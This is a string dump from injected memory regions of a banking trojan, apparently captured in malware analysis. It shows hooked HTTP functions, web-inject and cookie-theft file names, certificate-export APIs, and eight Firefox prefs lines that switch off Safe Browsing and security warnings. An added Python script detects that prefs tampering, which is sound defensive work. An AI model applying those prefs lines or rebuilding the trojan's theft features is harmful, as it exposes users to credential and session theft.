/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
nspr4.dll
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\%s
\Content.IE5\*.*
set_url
PFXImportCertStore
user32.dll
%d.%d.%d
keys
http:
urlmask
cert
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
HttpSendRequestA
HttpSendRequestW
hXXp://
hXXps://
HTTP/1.
.mpeg
.jpeg
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpAddRequestHeadersA
HttpOpenRequestA
wlcomm.exe
msmsgs.exe
msnmsgr.exe
PR_OpenTCPSocket
kernel32.dll
Crypt32.dll
Advapi32.dll
ws2_32.dll
wininet.dll
Ht.Ht!HHt
w SSh
SSSSh
t.VPW
%System%\WININET.dll
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\USER32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
trivax1.Bin.exe
config.bin
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
trivax1.Bin
Microsoft Windows
%System%\ADVAPI32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
CertCloseStore
CertAddCertificateContextToStore
CertOpenStore
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertNameToStrA
CertEnumCertificatesInStore
CertOpenSystemStoreA
CRYPT32.dll
ntdll.dll
WS2_32.dll
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
WININET.dll
SHLWAPI.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
WaitNamedPipeA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
EnumWindows
GetKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptGetKeyParam
CryptGetUserKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
3-33383|3
6"6(6-676
RapportUtil.
(GMT %su:u) %s
\prefs.js
RapportTanzan36.
RapportKoan.
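The user_pref(...) strings recovered from the injected regions above, together with /Mozilla/Firefox/profiles.ini and \prefs.js, are consistent with the bot appending those eight lines to the victim's Firefox prefs.js: Safe Browsing and the weak/mixed-content warnings are switched off, and cookies and sessions are no longer cleared on shutdown, so the stolen cookies.sqlite and sessionstore.js stay useful. The checker below is an added example written for this page, not code from the report or from the sample; it parses prefs.js (Firefox keeps the last value for a repeated pref, which the parser reproduces), reports which of those eight prefs hold the bot's forced value, and treats four or more hits as suspicious. The threshold and the sample prefs.js content are assumptions, not captured data.

```python
import re
from typing import Dict, List

# The eight prefs found as strings in the injected regions, with the value
# the sample forces. A profile where most of them hold that value is a
# strong tamper signal; any one alone can be a legitimate user choice.
TAMPERED_PREFS = {
    "browser.safebrowsing.enabled": False,
    "browser.safebrowsing.malware.enabled": False,
    "security.warn_entering_weak": False,
    "security.warn_entering_weak.show_once": False,
    "security.warn_viewing_mixed": False,
    "security.warn_viewing_mixed.show_once": False,
    "privacy.clearOnShutdown.cookies": False,
    "privacy.clearOnShutdown.sessions": False,
}

# user_pref("name", value);  value is true/false, an integer or a quoted string
_PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')


def parse_prefs(text: str) -> Dict[str, object]:
    """Parse prefs.js content into {name: value}. Comment lines and anything
    that is not a user_pref() call are skipped; a repeated pref keeps the last
    value, which is how Firefox itself reads the file."""
    prefs: Dict[str, object] = {}
    for line in text.splitlines():
        m = _PREF_RE.match(line)
        if not m:
            continue
        name, raw = m.group(1), m.group(2).strip()
        if raw in ("true", "false"):
            value: object = (raw == "true")
        elif len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
            value = raw[1:-1]
        else:
            try:
                value = int(raw)
            except ValueError:
                value = raw  # leave unparsed forms as-is rather than guess
        prefs[name] = value
    return prefs


def find_tampering(text: str) -> List[str]:
    """Names of prefs whose effective value equals the bot's forced value.
    'is' is used on purpose: an integer 0 must not count as False."""
    prefs = parse_prefs(text)
    return sorted(name for name, forced in TAMPERED_PREFS.items()
                  if prefs.get(name) is forced)


def is_suspicious(text: str, threshold: int = 4) -> bool:
    """Threshold is an assumption chosen for this example, not from the report."""
    return len(find_tampering(text)) >= threshold


# Constructed sample prefs.js, not captured from an infected host: the eight
# forced prefs plus two benign ones, and safebrowsing.enabled flipped back to
# true later in the file, which must override the earlier false.
SAMPLE_PREFS_JS = """// Mozilla User Preferences
user_pref("app.update.lastUpdateTime.background-update-timer", 1300000000);
user_pref("browser.startup.homepage", "about:blank");
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("browser.safebrowsing.enabled", true);
"""

# Constructed clean profile where the user only opted out of Safe Browsing.
CLEAN_PREFS_JS = """// Mozilla User Preferences
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.startup.homepage", "about:blank");
"""

if __name__ == "__main__":
    for label, content in (("sample", SAMPLE_PREFS_JS), ("clean", CLEAN_PREFS_JS)):
        hits = find_tampering(content)
        print(f"{label}: suspicious={is_suspicious(content)} hits={hits}")
```

To run it against a real profile, read the prefs.js named by the [Profile*] sections of profiles.ini and pass its text to is_suspicious(); on a live host also compare the file's modification time against the last browser start, since the bot rewrites the file while the browser is closed or from an injected process rather than through the Firefox UI.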
lsass.exe_736_rwx_0BAD0000_00045000:
svchost.exe_904_rwx_0BAD0000_00045000:
svchost.exe_988_rwx_0BAD0000_00045000:
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
svchost.exe_1084_rwx_0BAD0000_00045000:
svchost.exe_1128_rwx_0BAD0000_00045000:
svchost.exe_1180_rwx_0BAD0000_00045000:
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
c:\windows\system32\WS2_32.dll
c:\windows\system32\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
spoolsv.exe_1424_rwx_0BAD0000_00045000:
.text
.reloc
config.dat
explorer.exe
webinjects.txt
screenshots.txt
threadmetadata!nfo%d
XX
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
0xx
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
Content-Length: %u
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies.txt
sessionstore.js
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite
GdiplusShutdown
gdiplus.dll
\\.\pipe\processingpipe_
services.exe
csrss.exe
smss.exe
\\.\pipe\globpluginspipe
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
nspr4.dll
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\%s
\Content.IE5\*.*
set_url
PFXImportCertStore
user32.dll
%d.%d.%d
keys
http:
urlmask
cert
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
HttpSendRequestA
HttpSendRequestW
hXXp://
hXXps://
HTTP/1.
.mpeg
.jpeg
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpAddRequestHeadersA
HttpOpenRequestA
wlcomm.exe
msmsgs.exe
msnmsgr.exe
PR_OpenTCPSocket
kernel32.dll
Crypt32.dll
Advapi32.dll
ws2_32.dll
wininet.dll
Ht.Ht!HHt
w SSh
SSSSh
t.VPW
%System%\WININET.dll
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\USER32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
trivax1.Bin.exe
config.bin
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
trivax1.Bin
Microsoft Windows
%System%\ADVAPI32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
CertCloseStore
CertAddCertificateContextToStore
CertOpenStore
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertNameToStrA
CertEnumCertificatesInStore
CertOpenSystemStoreA
CRYPT32.dll
ntdll.dll
WS2_32.dll
FindCloseUrlCache
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
WININET.dll
SHLWAPI.dll
GetProcessHeap
DisconnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
WaitNamedPipeA
KERNEL32.dll
GetKeyboardState
MsgWaitForMultipleObjects
EnumWindows
GetKeyState
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptGetKeyParam
CryptGetUserKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
3-33383|3
6"6(6-676
RapportUtil.
(GMT %su:u) %s
\prefs.js
RapportTanzan36.
RapportKoan.
jqs.exe_1640_rwx_0BAD0000_00045000:
.text
.reloc
config.dat
explorer.exe
webinjects.txt
screenshots.txt
threadmetadata!nfo%d
XX
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
0xx
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
Content-Length: %u
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies.txt
sessionstore.js
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite
GdiplusShutdown
gdiplus.dll
\\.\pipe\processingpipe_
services.exe
csrss.exe
smss.exe
\\.\pipe\globpluginspipe
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
nspr4.dll
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\%s
\Content.IE5\*.*
set_url
PFXImportCertStore
user32.dll
%d.%d.%d
keys
http:
urlmask
cert
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
HttpSendRequestA
HttpSendRequestW
hXXp://
hXXps://
HTTP/1.
.mpeg
.jpeg
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
